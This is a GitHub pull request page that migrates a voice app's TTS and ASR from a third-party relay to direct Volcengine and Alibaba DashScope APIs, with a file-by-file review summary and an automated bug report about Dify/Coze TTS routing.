Skip to content

feat: migrate TTS providers to backend direct routing#36

Open
Kiritogu wants to merge 13 commits intodatawhalechina:devfrom
Kiritogu:fix/tts-voice-flow
Open

feat: migrate TTS providers to backend direct routing#36
Kiritogu wants to merge 13 commits intodatawhalechina:devfrom
Kiritogu:fix/tts-voice-flow

Conversation

@Kiritogu
Copy link

@Kiritogu Kiritogu commented Mar 1, 2026

概要

将 TTS 和 ASR 模块从第三方中转服务(unspeech)迁移至直接对接火山引擎和阿里云 DashScope 官方 API,同时新增增量流式 TTS、实时 ASR WebSocket、麦克风交互等能力。

问题

  • TTS 合成依赖第三方中转服务 unspeech.hyp3r.link,增加了延迟和单点故障风险
  • ASR 仅支持批量转写,缺少实时流式语音识别
  • 前端缺少麦克风输入按钮,无法在对话界面直接语音交互
  • LLM 流式输出时 TTS 需等待完整回复,响应体验差
  • 语音提供商列表包含多个未实际接入的占位项

关联 Issue / PR:

解决方案

后端:为火山引擎和阿里云分别实现原生 API 调用(火山引擎走 HTTPS + Base64 JSON 至 openspeech.bytedance.com,阿里云走 WebSocket 三阶段协议至 dashscope.aliyuncs.com),消除对 unspeech 中转的依赖。新增阿里云 DashScope 实时 ASR(qwen3-asr-flash-realtime)WebSocket 流式识别。Provider Registry 新增本地语音目录(JSON 文件),按模型筛选兼容音色。

前端:实现增量流式 TTS(TtsStreamSegmenter 在 LLM token 到达时按句分段、立即合成),新增多个工具函数模块化拆分逻辑。对话界面和桌面端新增麦克风按钮,支持静音/取消静音状态。精简语音提供商列表,仅保留已实际接入的 4 个提供商。

变更内容

核心变更

后端 TTS 直连路由 (backend/app/api/tts.py, +675/-191)

  • 新增 _forward_volcengine_tts:直接调用火山引擎 TTS API,Bearer token 鉴权,Base64 音频解码
  • 新增 _forward_alibaba_tts:通过 WebSocket 对接阿里云 CosyVoice(run-task → continue-task → finish-task 三阶段协议)
  • 移除 Dify/Coze TTS 处理函数(_stream_dify_tts_stream_coze_tts)和旧的流式代理逻辑
  • 新增结构化错误提取和火山引擎凭证错误提示

后端 ASR 实时流 (backend/app/api/asr.py, +613/-24)

  • 新增阿里云 DashScope 批量转写(/compatible-mode/v1/chat/completions + input_audio
  • 新增 AliyunRealtimeSession 实时 WebSocket ASR(wss://dashscope.aliyuncs.com/api-ws/v1/realtime
  • 新增 WebSocket 断连检测与安全清理
  • 模型自动规范化:实时流强制 -realtime 后缀,批量自动去除

Provider Registry (backend/app/services/providers/registry.py, +225/-4)

  • list_voices 从本地 JSON 目录加载音色列表(LRU 缓存)
  • 阿里云音色按 compatible_models 过滤,匹配当前选中模型
  • 新增阿里云 NLS ASR 凭证验证和模型列表

前端增量流式 TTS (speech-output.ts + 新工具模块)

  • TtsStreamSegmenter:按标点和特殊标记分段 LLM 流式 token
  • runTtsChunkQueue:顺序合成分段,失败时回退合并剩余文本
  • tts-chunker.ts:支持 CJK 分词(Intl.Segmenter)、保留小数、省略号规范化
  • tts-direct-request.ts:构建直连 TTS 请求,405 时回退旧格式

前端 ASR 增强 (transcription.ts + 新工具模块)

  • 浏览器语音识别自动重启(shouldAutoRestartBrowserRecognition
  • AudioWorklet 失败自动回退 MediaRecorder(decideCaptureFallback
  • 转写结果清洗:过滤误识别的 Windows 路径(sanitizeTranscript
  • 语言代码规范化:zhzh-CN,默认跟随 navigator.language

前端 UI

  • ChatArea.vue / DesktopChatOverlay.vue:新增麦克风按钮(含静音/取消静音视觉状态)
  • App.vue:接入 onTokenLiteral / onTokenSpecial 驱动增量 TTS
  • AudioSection.vue:语言改为下拉选择,移除冗余开关
  • Tauri 窗口启用 useHttpsScheme 以支持麦克风权限

辅助变更

  • 新增语音目录数据文件:alibaba.json(CosyVoice 音色)、volcengine.json(火山引擎音色)
  • 精简 provider-fallback.ts / provider-options.ts:移除 7 个未接入的语音提供商
  • provider-visibility.ts:白名单仅保留 4 个已接入提供商
  • provider-fields.ts:有默认 baseUrl 时自动隐藏该字段
  • websockets 从 dev 依赖提升为运行时依赖(pyproject.toml
  • 配置文件 engines.yaml / providers.yaml 更新为官方 API 端点

注意事项

  • .idea/ 目录(JetBrains IDE 配置)被包含在提交中,建议加入 .gitignore 或从提交中移除
  • CLAUDE.md 作为项目指引文档一并提交

破坏性变更

  • 移除 Dify/Coze TTS 处理_stream_dify_tts_stream_coze_tts 等函数已删除
  • 移除 7 个前端语音提供商选项:OpenAI、ElevenLabs、Microsoft Speech、Index TTS、Comet API、Player2 等不再出现在设置中
  • 默认语音提供商变更:从 openai-audio-speech 改为 browser-local-audio-speech
  • TTS API 返回类型变更run_tts_engineStreamingResponse 改为 Response(返回完整音频缓冲区)
  • 阿里云模型 ID 格式变更alibaba/cosyvoice-v1cosyvoice-v1(去除前缀)

测试

新增 13 个测试文件覆盖核心逻辑:

后端测试(4 个):

  • test_tts_engine_relay.py:火山引擎 payload 构建、阿里云模型规范化、错误提取
  • test_asr_aliyun_dashscope.py:DashScope URL 构建、转写文本提取、模型规范化
  • test_provider_voices_tts.py:音色目录加载和模型过滤
  • test_provider_catalog_tts_defaults.py:TTS 提供商默认端点验证
  • test_provider_catalog_aliyun_fields.py:阿里云 NLS 字段规范化
  • test_asr_stream_disconnect.py:WebSocket 断连检测

前端测试(9 个):

  • audio-direct.test.ts:直连请求构建和旧格式回退
  • tts-chunker.test.ts:文本分段、CJK、特殊标记
  • tts-stream-segmenter.test.ts:流式分段和 drain
  • tts-streaming-runner.test.ts:队列执行、错误处理
  • browser-recognition-restart.test.ts:自动重启逻辑
  • capture-startup.test.ts:Worklet 回退逻辑
  • provider-fields.test.ts / provider-visibility.test.ts:字段过滤和可见性
  • transcript-filter.test.ts / transcription-language.test.ts:转写清洗和语言规范化

自测方式

  • 后端单测通过(pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py
  • 前端单测通过
  • 本地启动后端 + 前端,验证火山引擎 TTS 合成正常
  • 本地验证阿里云 CosyVoice TTS 合成正常
  • 本地验证阿里云 DashScope 实时 ASR 流式识别正常
  • 对话界面麦克风按钮功能正常(Web + Tauri)
  • LLM 流式回复时增量 TTS 播放正常
  • pnpm -C frontend --filter @whalewhisper/web build 构建通过

Checklist

  • 代码符合项目规范
  • 已完成自审
  • 本地测试通过
  • 文档已更新(如需要)
  • .idea/ 目录已从提交中移除或加入 .gitignore

由 Claude AI 自动生成

Copy link
Contributor

@greptile-apps greptile-apps bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Your free trial has ended. If you'd like to continue receiving code reviews, you can add a payment method here.

@github-actions github-actions bot added area/backend Touches backend (FastAPI/Python) area/frontend Touches frontend (Vue/TS) needs-review Needs careful review (large/complex changes) size/XL PR size: >= 1000 lines changed type/feature New feature labels Mar 1, 2026
@qodo-code-review
Copy link

Review Summary by Qodo

Migrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs

✨ Enhancement 🧪 Tests

Grey Divider

Walkthroughs

Description
• Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine
  and Alibaba, replacing unspeech relay
• Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and
  chunk-based playback
• Add microphone input to chat interface and desktop overlay with source-aware listening context
  tracking
• Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support
• Add local static voice catalogs for Volcengine and Alibaba providers with backend voice listing
  API
• Normalize Alibaba model IDs by removing alibaba/ prefix in frontend and backend processing
• Prune frontend speech providers to Volcengine, Alibaba, and local audio only with visibility
  filtering
• Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs,
  and field normalization
• Implement transcript sanitization, language normalization, and browser recognition auto-restart
  logic
• Add provider field filtering to hide redundant baseUrl configuration when defaults exist
• Update default speech provider from OpenAI to browser-local-audio-speech
• Add IDE configuration files and comprehensive development guide (CLAUDE.md)
Diagram
flowchart LR
  FE["Frontend<br/>Chat/Settings UI"]
  BE["Backend<br/>API Router"]
  VC["Volcengine<br/>Official API"]
  AC["Alibaba<br/>DashScope API"]
  
  FE -->|"/api/tts/engines"| BE
  FE -->|"/api/providers/voices"| BE
  FE -->|"/api/asr/stream"| BE
  
  BE -->|"Direct TTS"| VC
  BE -->|"Direct TTS/ASR"| AC
  
  FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
  STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
  QUEUE -->|"Sequential requests"| BE
Loading

Grey Divider

File Changes

1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue ✨ Enhancement +96/-102

Refactor audio settings UI for source-aware listening

• Refactored microphone input handling to support multiple listening sources (settings-test and
 chat-input) with source tracking
• Replaced manual voice selection UI with language dropdown selector for transcription
• Removed voiceId and refreshVoices from speech output state management
• Updated listening state to use listeningSource for context-aware UI rendering
• Simplified transcription test UI with improved feedback display

frontend/packages/stage-settings-ui/src/components/AudioSection.vue


2. frontend/apps/web/src/components/widgets/ChatArea.vue ✨ Enhancement +109/-34

Add microphone input button to chat interface

• Added microphone button to chat input area with visual feedback for active listening
• Integrated useTranscriptionStore to manage chat-specific transcription state
• Implemented toggleChatMic function to start/stop listening with chat-input source
• Added error display for transcription errors in chat context

frontend/apps/web/src/components/widgets/ChatArea.vue


3. frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue ✨ Enhancement +85/-18

Add microphone input to desktop chat overlay

• Added microphone button to desktop chat overlay with active state styling
• Integrated transcription store for managing listening state and errors
• Implemented toggleChatMic function for chat-input source listening
• Added visual feedback and error display for transcription in chat

frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue


View more (60)
4. frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue ✨ Enhancement +17/-0

Add microphone cleanup for settings window lifecycle

• Added cleanup for settings-test microphone sessions on window close
• Implemented visibility change listener to stop test microphone when window hidden
• Added stopSettingsTestMic function to manage listening source cleanup

frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue


5. frontend/apps/web/src/components/settings/SettingsDialog.vue ✨ Enhancement +5/-0

Add microphone cleanup for settings dialog

• Added cleanup to stop settings-test listening when settings dialog closes
• Integrated useTranscriptionStore for managing test microphone state

frontend/apps/web/src/components/settings/SettingsDialog.vue


6. frontend/apps/desktop-tauri/renderer/src/ChatApp.vue ✨ Enhancement +8/-0

Integrate speech output for assistant messages

• Added useSpeechOutputStore integration for automatic speech synthesis
• Implemented listener for assistant final messages to trigger speech output
• Added chatStore.connect() call on mount

frontend/apps/desktop-tauri/renderer/src/ChatApp.vue


7. frontend/apps/web/src/App.vue ✨ Enhancement +7/-1

Add incremental speech synthesis for assistant responses

• Added token literal listener to push assistant text to speech output incrementally
• Updated special token handling to include speech output processing
• Changed final message handling to use endAssistantStream for streaming TTS

frontend/apps/web/src/App.vue


8. frontend/packages/app-settings/src/sections/ModelSection.vue ✨ Enhancement +9/-3

Reset voice selection on model change

• Added logic to reset voice field when speech model changes
• Implemented provider refresh after model selection change

frontend/packages/app-settings/src/sections/ModelSection.vue


9. frontend/packages/app-settings/src/sections/AudioSection.vue ✨ Enhancement +6/-1

Add microphone cleanup on unmount

• Added cleanup to stop settings-test listening on component unmount

frontend/packages/app-settings/src/sections/AudioSection.vue


10. frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue ✨ Enhancement +7/-0

Add voice field empty state placeholder

• Added placeholder text for voice field when no compatible voices available

frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue


11. frontend/packages/app-core/src/stores/speech-output.ts ✨ Enhancement +404/-87

Implement incremental TTS streaming for assistant

• Removed voiceId local storage and replaced with provider config voice
• Implemented incremental streaming support with TtsStreamSegmenter for assistant responses
• Added pushAssistantLiteral, pushAssistantSpecial, and endAssistantStream methods for
 streaming TTS
• Refactored TTS request handling to use requestTtsDirect with retry logic
• Added chunk-based playback with fallback to merged remainder on failure

frontend/packages/app-core/src/stores/speech-output.ts


12. frontend/packages/app-core/src/stores/transcription.ts ✨ Enhancement +210/-60

Add listening source tracking and language normalization

• Added listeningSource tracking to distinguish between settings-test and chat-input contexts
• Implemented browser recognition auto-restart logic with error recovery
• Added language normalization and initial language resolution based on navigator
• Refactored listening start/stop to accept options for source and auto-send configuration
• Added transcript sanitization to filter invalid paths and normalize text

frontend/packages/app-core/src/stores/transcription.ts


13. frontend/packages/app-core/src/data/provider-fallback.ts ⚙️ Configuration changes +12/-232

Prune unsupported speech providers and update endpoints

• Removed OpenAI and OpenAI-compatible speech providers from fallback catalog
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine default base URL from unspeech relay to official endpoint
• Updated Alibaba Cloud default base URL and model IDs (removed alibaba/ prefix)
• Updated Aliyun NLS transcription provider metadata and description

frontend/packages/app-core/src/data/provider-fallback.ts


14. frontend/packages/app-core/src/utils/tts-direct-request.ts ✨ Enhancement +262/-0

Add TTS direct request builder utility

• New utility for building backend relay TTS requests with engine-specific config normalization
• Implements legacy fallback request building for compatibility
• Handles Alibaba model ID normalization and Volcengine appId resolution
• Supports legacy unspeech endpoint migration to official provider endpoints

frontend/packages/app-core/src/utils/tts-direct-request.ts


15. frontend/packages/app-core/src/utils/tts-chunker.ts ✨ Enhancement +243/-0

Add TTS text chunking utility

• New utility for intelligent text chunking optimized for TTS streaming
• Implements punctuation-aware segmentation with word count balancing
• Supports special markers for flush and special token handling
• Provides sanitization to remove special markers from output chunks

frontend/packages/app-core/src/utils/tts-chunker.ts


16. frontend/packages/app-core/src/data/provider-options.ts ⚙️ Configuration changes +7/-104

Update provider options for backend relay

• Removed OpenAI and OpenAI-compatible speech provider options
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine and Alibaba Cloud provider configurations with new endpoints
• Updated Aliyun NLS transcription provider metadata

frontend/packages/app-core/src/data/provider-options.ts


17. frontend/packages/app-core/src/services/audio-direct.test.ts 🧪 Tests +172/-0

Add tests for TTS direct request builder

• New test suite for TTS direct request building and legacy fallback
• Tests engine support detection, request building, URL normalization
• Validates Alibaba model ID normalization and legacy request conversion

frontend/packages/app-core/src/services/audio-direct.test.ts


18. frontend/packages/app-core/src/services/audio.ts ✨ Enhancement +100/-13

Implement backend relay TTS with legacy fallback

• Refactored requestTts to use requestTtsDirect with backend relay support
• Added fallback to legacy /api/tts/synthesize endpoint on 405 response
• Implemented JSON response parsing for base64-encoded audio payloads
• Added error handling with status code and detail information

frontend/packages/app-core/src/services/audio.ts


19. frontend/packages/app-core/src/utils/transcript-filter.ts ✨ Enhancement +17/-0

Add transcript sanitization utility

• New utility to sanitize transcripts by filtering invalid Windows absolute paths
• Prevents file paths from being treated as transcribed text

frontend/packages/app-core/src/utils/transcript-filter.ts


20. frontend/packages/app-core/src/stores/providers.ts ✨ Enhancement +63/-5

Provider normalization and visibility filtering for speech providers

• Added imports for filterProviderFields and isVisibleSpeechProviderId utilities
• Implemented normalizeProviderEntry() to normalize Aliyun NLS provider fields
• Implemented filterRemovedSpeechProviders() to filter speech providers by visibility
• Updated effectiveProviders computed to apply normalization and filtering to provider catalogs
• Modified getProviderFields() to use filterProviderFields() for field filtering
• Added queueProviderRefresh() helper function for provider refresh management
• Added watcher for settings store provider IDs to trigger provider refresh on changes
• Updated provider config watcher to use queueProviderRefresh()

frontend/packages/app-core/src/stores/providers.ts


21. frontend/packages/app-core/src/services/providers.ts ✨ Enhancement +33/-58

Migrate voice fetching to backend API endpoint

• Removed unspeech library imports and dependencies
• Replaced local Alibaba voice handling with backend API call to /api/providers/voices
• Simplified listProviderVoices() to use unified backend endpoint for voice fetching
• Added support for both direct backend calls and proxy-based requests
• Removed complex voice filtering and model candidate logic (moved to backend)

frontend/packages/app-core/src/services/providers.ts


22. frontend/packages/app-core/src/utils/tts-streaming-runner.ts ✨ Enhancement +72/-0

TTS chunk queue processing with error recovery

• New utility for processing TTS text chunks with error handling and recovery
• Implements runTtsChunkQueue() to process chunks sequentially with configurable error behavior
• Supports stopOnError option to halt on first failure or continue processing
• Provides TtsChunkQueueError for detailed error context with chunk index and total count
• Distinguishes between abort errors (which are rethrown) and recoverable errors

frontend/packages/app-core/src/utils/tts-streaming-runner.ts


23. frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts 🧪 Tests +79/-0

Tests for TTS chunk queue processing

• Test suite for runTtsChunkQueue() function
• Validates chunk processing continuation on individual failures
• Validates error throwing when all chunks fail
• Validates abort error propagation without suppression
• Validates stopOnError option behavior with error context

frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts


24. frontend/packages/app-core/src/utils/provider-fields.ts ✨ Enhancement +23/-0

Provider field filtering based on defaults

• New utility to filter provider configuration fields based on defaults
• Hides baseUrl field when provider has default base URL in provider defaults or field default
• Reduces configuration complexity by hiding redundant fields

frontend/packages/app-core/src/utils/provider-fields.ts


25. frontend/packages/app-core/src/utils/provider-fields.test.ts 🧪 Tests +61/-0

Tests for provider field filtering

• Test suite for filterProviderFields() function
• Validates baseUrl field hiding when provider has default base URL
• Validates baseUrl field hiding when field itself has default value
• Validates baseUrl field retention when no defaults exist

frontend/packages/app-core/src/utils/provider-fields.test.ts


26. frontend/packages/app-core/src/utils/tts-chunker.test.ts 🧪 Tests +51/-0

Tests for TTS text chunking logic

• Test suite for TTS text chunking utilities
• Validates sentence splitting on hard punctuation
• Validates decimal number preservation in chunking
• Validates ellipsis normalization from three dots
• Validates special token and flush instruction handling

frontend/packages/app-core/src/utils/tts-chunker.test.ts


27. frontend/packages/app-core/src/utils/capture-startup.ts ✨ Enhancement +35/-0

Audio capture fallback decision logic

• New utility for audio capture fallback decision logic
• Implements decideCaptureFallback() to choose between media recorder and worklet modes
• Normalizes error messages from various error types
• Provides actionable error information when no fallback is available

frontend/packages/app-core/src/utils/capture-startup.ts


28. frontend/packages/app-core/src/utils/capture-startup.test.ts 🧪 Tests +63/-0

Tests for audio capture fallback logic

• Test suite for audio capture fallback decision logic
• Validates fallback to media recorder when worklet fails
• Validates error return when no fallback available
• Validates error message normalization for non-Error types

frontend/packages/app-core/src/utils/capture-startup.test.ts


29. frontend/packages/app-core/src/utils/tts-stream-segmenter.ts ✨ Enhancement +64/-0

TTS stream segmentation for incremental processing

• New class TtsStreamSegmenter for streaming TTS text segmentation
• Manages incremental text input with special markers for flushing and control
• Emits completed chunks while preserving trailing text for next iteration
• Supports finalization mode for emitting remaining buffered text

frontend/packages/app-core/src/utils/tts-stream-segmenter.ts


30. frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts 🧪 Tests +39/-0

Tests for TTS stream segmentation

• Test suite for TtsStreamSegmenter class
• Validates sentence emission while keeping trailing text
• Validates special marker flushing behavior
• Validates final drain emission of incomplete sentences

frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts


31. frontend/packages/app-core/src/utils/provider-visibility.ts ✨ Enhancement +14/-0

Speech provider visibility filtering

• New utility defining visible speech provider IDs
• Implements isVisibleSpeechProviderId() to check provider visibility
• Implements filterVisibleSpeechProviders() to filter provider lists
• Restricts visible providers to Volcengine, Alibaba, and local audio providers

frontend/packages/app-core/src/utils/provider-visibility.ts


32. frontend/packages/app-core/src/utils/provider-visibility.test.ts 🧪 Tests +42/-0

Tests for speech provider visibility

• Test suite for speech provider visibility functions
• Validates visibility of configured speech providers
• Validates filtering of unsupported speech provider IDs

frontend/packages/app-core/src/utils/provider-visibility.test.ts


33. frontend/packages/app-core/src/utils/browser-recognition-restart.ts ✨ Enhancement +23/-0

Browser speech recognition restart decision logic

• New utility for browser speech recognition auto-restart logic
• Implements shouldAutoRestartBrowserRecognition() with multiple decision factors
• Prevents restart on manual stop, permission denial, and other fatal errors

frontend/packages/app-core/src/utils/browser-recognition-restart.ts


34. frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts 🧪 Tests +56/-0

Tests for browser recognition restart logic

• Test suite for browser recognition restart logic
• Validates restart on active user session without fatal errors
• Validates no restart after manual stop
• Validates no restart on microphone permission denial

frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts


35. frontend/packages/app-core/src/utils/transcription-language.ts ✨ Enhancement +25/-0

Transcription language normalization utility

• New utility for transcription language normalization
• Implements normalizeTranscriptionLanguage() to standardize language codes
• Implements resolveInitialTranscriptionLanguage() with fallback to English
• Normalizes short codes (zhzh-CN, enen-US)

frontend/packages/app-core/src/utils/transcription-language.ts


36. frontend/packages/app-core/src/utils/transcription-language.test.ts 🧪 Tests +40/-0

Tests for transcription language normalization

• Test suite for transcription language normalization
• Validates short language code expansion
• Validates specific locale preservation
• Validates fallback to English when language missing

frontend/packages/app-core/src/utils/transcription-language.test.ts


37. frontend/packages/app-core/src/utils/transcript-filter.test.ts 🧪 Tests +23/-0

Tests for transcript filtering

• Test suite for transcript sanitization
• Validates filtering of Windows absolute file paths
• Validates preservation of natural language transcripts

frontend/packages/app-core/src/utils/transcript-filter.test.ts


38. frontend/packages/app-core/src/stores/settings.ts ⚙️ Configuration changes +1/-1

Update default speech provider to local audio

• Changed default speech provider from openai-audio-speech to browser-local-audio-speech

frontend/packages/app-core/src/stores/settings.ts


39. backend/app/api/tts.py ✨ Enhancement +675/-191

Direct TTS provider routing for Volcengine and Alibaba

• Refactored TTS engine routing to support direct provider endpoints for Volcengine and Alibaba
• Implemented _forward_volcengine_tts() for direct Volcengine API calls with custom payload format
• Implemented _forward_alibaba_tts() for WebSocket-based Alibaba DashScope TTS
• Added comprehensive error extraction and decoration for provider-specific error messages
• Replaced streaming response with direct response for better error handling
• Added helper functions for payload building, model/voice resolution, and parameter parsing
• Removed legacy Dify and Coze TTS streaming implementations

backend/app/api/tts.py


40. backend/app/api/asr.py ✨ Enhancement +613/-24

Alibaba Bailian DashScope ASR integration with realtime support

• Added support for Alibaba Bailian DashScope ASR with realtime WebSocket streaming
• Implemented _forward_aliyun_dashscope_transcription() for non-realtime ASR via chat API
• Implemented realtime ASR session management with AliyunRealtimeSession dataclass
• Added WebSocket connection handling with proper cleanup and error recovery
• Enhanced streaming endpoint to support Alibaba realtime ASR with audio buffering
• Added helper functions for URL building, credential resolution, and event parsing
• Improved WebSocket disconnect handling with fallback error reporting

backend/app/api/asr.py


41. backend/app/services/providers/registry.py ✨ Enhancement +225/-4

Local TTS voice catalogs and Alibaba ASR support

• Added local TTS voice catalog loading for Volcengine and Alibaba providers
• Implemented _load_local_tts_voices() to load voices from JSON files
• Implemented voice parsing for Alibaba and Volcengine formats with model filtering
• Added Alibaba NLS ASR provider validation and model listing
• Implemented model candidate resolution for Alibaba voice filtering
• Added voice description building from language and compatibility metadata

backend/app/services/providers/registry.py


42. backend/tests/test_tts_engine_relay.py 🧪 Tests +188/-0

Tests for TTS engine relay and payload building

• New test suite for TTS engine relay functions
• Tests for TTS input extraction from various formats
• Tests for API key resolution with override precedence
• Tests for Volcengine and Alibaba payload building
• Tests for model normalization and error decoration

backend/tests/test_tts_engine_relay.py


43. backend/tests/test_asr_aliyun_dashscope.py 🧪 Tests +112/-0

Tests for Alibaba DashScope ASR integration

• New test suite for Alibaba DashScope ASR functions
• Tests for URL building and credential resolution
• Tests for realtime WebSocket URL construction
• Tests for ASR text extraction from various response formats
• Tests for model resolution and event parsing

backend/tests/test_asr_aliyun_dashscope.py


44. backend/tests/test_provider_voices_tts.py 🧪 Tests +110/-0

Tests for provider voice catalog listing

• New test suite for provider voice listing
• Tests for local voice catalog loading for Volcengine and Alibaba
• Tests for model-based voice filtering for Alibaba
• Tests for unsupported provider handling

backend/tests/test_provider_voices_tts.py


45. backend/tests/test_provider_catalog_tts_defaults.py 🧪 Tests +43/-0

Tests for TTS provider catalog defaults

• New test suite for TTS provider catalog defaults
• Validates Volcengine uses official endpoint as default base URL
• Validates Alibaba uses DashScope endpoint with correct model defaults
• Validates model field options in provider catalog

backend/tests/test_provider_catalog_tts_defaults.py


46. backend/app/api/providers.py ✨ Enhancement +52/-23

Refactor provider field serialization with Alibaba-specific filtering

• Added ALIYUN_NLS_PROVIDER_ID constant for Alibaba NLS provider identification
• Extracted field serialization logic into _provider_field_to_dict() helper function
• Created _aliyun_nls_default_field_dicts() to return minimal field configuration (API key only)
 for Alibaba provider
• Introduced _resolve_provider_field_dicts() to conditionally filter provider fields, hiding
 OpenAI-style fields for Alibaba NLS

backend/app/api/providers.py


47. backend/tests/test_provider_catalog_aliyun_fields.py 🧪 Tests +76/-0

Add Alibaba provider field normalization tests

• New test file validating Alibaba NLS provider field normalization
• Tests that only apiKey field is exposed when OpenAI-style fields are present
• Verifies minimal field shape enforcement for Alibaba provider configuration

backend/tests/test_provider_catalog_aliyun_fields.py


48. backend/tests/test_asr_stream_disconnect.py 🧪 Tests +45/-0

Add ASR stream disconnect detection tests

• New test file for WebSocket disconnect detection in ASR streaming
• Tests _is_websocket_disconnect_message() for disconnect frame detection
• Tests _is_disconnect_receive_runtime_error() for runtime error message matching
• Validates that unrelated runtime errors are properly ignored

backend/tests/test_asr_stream_disconnect.py


49. backend/app/services/providers/voices/alibaba.json ⚙️ Configuration changes +294/-0

Add Alibaba Bailian TTS voice catalog

• New static voice catalog for Alibaba Bailian TTS provider
• Contains 20 voice profiles with metadata (name, preview URL, model, voice ID, scenarios, language,
 bitrate, format)
• Supports cosyvoice-v1 model with Chinese and bilingual voice options

backend/app/services/providers/voices/alibaba.json


50. backend/config/providers.yaml ⚙️ Configuration changes +11/-18

Migrate TTS/ASR providers to official endpoints with field normalization

• Updated Volcengine TTS provider: changed base_url from https://unspeech.hyp3r.link/v1/ to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS provider: changed base_url to https://dashscope.aliyuncs.com and
 normalized model ID from alibaba/cosyvoice-v1 to cosyvoice-v1
• Updated Alibaba ASR provider: added engine_id: aliyun-nls-asr, removed baseUrl and model
 fields, kept only apiKey field
• Changed Alibaba ASR voice field type from select with options_source: voices to plain text
 type

backend/config/providers.yaml


51. backend/config/engines.yaml ⚙️ Configuration changes +27/-3

Add Alibaba Bailian ASR engine and update TTS endpoints

• Updated Volcengine TTS engine: changed base_url from https://unspeech.hyp3r.link/v1 to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS engine: changed base_url to https://dashscope.aliyuncs.com and model from
 alibaba/cosyvoice-v1 to cosyvoice-v1
• Added new aliyun-nls-asr engine with type aliyun_dashscope_asr, pointing to
 https://dashscope.aliyuncs.com
• Configured ASR defaults and parameters for Alibaba provider (VAD, ITN, region settings)

backend/config/engines.yaml


52. frontend/apps/desktop-tauri/src-tauri/tauri.conf.json ⚙️ Configuration changes +2/-0

Enable HTTPS scheme for Tauri desktop windows

• Added "useHttpsScheme": true to main window configuration
• Added "useHttpsScheme": true to settings window configuration

frontend/apps/desktop-tauri/src-tauri/tauri.conf.json


53. backend/pyproject.toml Dependencies +1/-1

Promote websockets to core dependency

• Moved websockets>=12.0 from optional dev dependencies to core dependencies
• Makes WebSocket support a required dependency for all installations

backend/pyproject.toml


54. .idea/whale-whisper.iml ⚙️ Configuration changes +8/-0

Add IDE module configuration

• New PyCharm/IntelliJ IDE module configuration file
• Defines Python module structure with inherited JDK and source folder settings

.idea/whale-whisper.iml


55. .idea/modules.xml ⚙️ Configuration changes +8/-0

Add IDE project module registry

• New IDE project module manager configuration
• Registers whale-whisper.iml module for the project

.idea/modules.xml


56. .idea/vcs.xml ⚙️ Configuration changes +7/-0

Add IDE Git version control mapping

• New IDE version control configuration
• Maps project root and airi submodule to Git version control

.idea/vcs.xml


57. .idea/misc.xml ⚙️ Configuration changes +4/-0

Add IDE project JDK configuration

• New IDE project settings configuration
• Specifies whale-whisper Python SDK as project JDK

.idea/misc.xml


58. .idea/inspectionProfiles/profiles_settings.xml ⚙️ Configuration changes +6/-0

Add IDE inspection profile settings

• New IDE inspection profiles settings
• Disables project-specific inspection profile in favor of default settings

.idea/inspectionProfiles/profiles_settings.xml


59. .idea/easycode.ignore ⚙️ Configuration changes +13/-0

Add EasyCode plugin ignore patterns

• New ignore patterns file for EasyCode IDE plugin
• Excludes common build artifacts, node modules, test files, and minified assets

.idea/easycode.ignore


60. CLAUDE.md 📝 Documentation +296/-0

Add comprehensive Claude Code development guide

• New comprehensive development guide for Claude Code integration
• Documents project overview, architecture, code standards, testing procedures, and common commands
• Includes environment setup instructions, project structure, and contribution guidelines
• Provides troubleshooting tips and resource references

CLAUDE.md


61. .idea/inspectionProfiles/Project_Default.xml Additional files +144/-0

...

.idea/inspectionProfiles/Project_Default.xml


62. backend/app/services/providers/voices/volcengine.json Additional files +3176/-0

...

backend/app/services/providers/voices/volcengine.json


63. frontend/apps/desktop-tauri/renderer/src/App.vue Additional files +0/-7

...

frontend/apps/desktop-tauri/renderer/src/App.vue


Grey Divider

Qodo Logo

@qodo-code-review
Copy link

qodo-code-review bot commented Mar 1, 2026

Code Review by Qodo

🐞 Bugs (3) 📘 Rule violations (0) 📎 Requirement gaps (0)

Grey Divider


Action required

1. Dify/Coze TTS broken 🐞 Bug ✓ Correctness
Description
run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and
instead falls through to _build_unspeech_payload, which requires model and voice. Since
dify-tts/coze-tts are still configured without a model, these engines will now error (400) or
send incompatible payloads to their provider endpoints.
Code

backend/app/api/tts.py[R76-115]

@router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
   if not text:
       raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
   overrides = request.config if isinstance(request.config, dict) else {}
